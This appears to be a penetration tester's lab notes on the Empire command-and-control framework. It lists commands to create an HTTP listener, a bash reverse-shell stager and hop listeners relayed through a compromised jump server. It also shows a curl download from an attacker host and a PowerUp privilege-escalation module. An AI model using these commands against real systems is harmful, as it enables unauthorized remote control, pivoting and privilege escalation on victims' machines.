C2
There are many different C2 frameworks. They can be hosted in the cloud for collaborative red teams
Empire
Empire components:
Listeners are well... listeners. They listen for a connection and facilitate further exploitation
Stagers are essentially payloads generated by Empire to create a robust reverse shell in conjunction with a listener. They are the delivery mechanism for agents
Agents are the equivalent of a Metasploit "Session". They are connections to compromised targets, and allow an attacker to further interact with the system
Modules are used to in conjunction with agents to perform further exploitation. For example, they can work through an existing agent to dump the password hashes from the server
Listeners
uselistener http
set Name CLIHTTP
set Host 10.10.14.8
set Port 8000
execute
listeners
Stagers
Stagers are essentially Empire's payloads used to connect back to the C2 server and create an agent.
Linux Machines
usestager multi/bash
set Listener CLIHTTP
execute
Agents
Upload and run payload on target machine and check
agents
interact [ID]
helpHop Listeners
Hop listeners create files to be copied across to the compromised "jump" server and served from there. The files contain instructions to connect back to our C2 listener
uselistener http_hop
set RedirectListener CLIHTTP
set Host 10.200.101.200 <--- compromised webserver IP
set port 47000 <--- above 15000
Hop Listener Stager
usestager multi/launcher
set Listener http_hop
executeJump server (compromised webserver) setup
On Attacker machine
cd /tmp/http_hop
sudo zip -r hop.zip *
python3 -m http.server 80On jumpserver
mkdir /tmp/hop-adot8 && cd /tmp/hop-adot8
curl http://10.50.102.164/hop.zip -o hop.zip
unzip hop.zip
php -S 0.0.0.0:47000 & <-- Serves on php payloads (php must be installed)
firewall-cmd --zone=public --add-port 47000/tcpExecute Payload on internal target
Modules
PowerUp Invoke-AllChecks example
usemodule powershell_privesc_powerup_allchecks
set Agent [ID]
execute
agents
intereact [ID]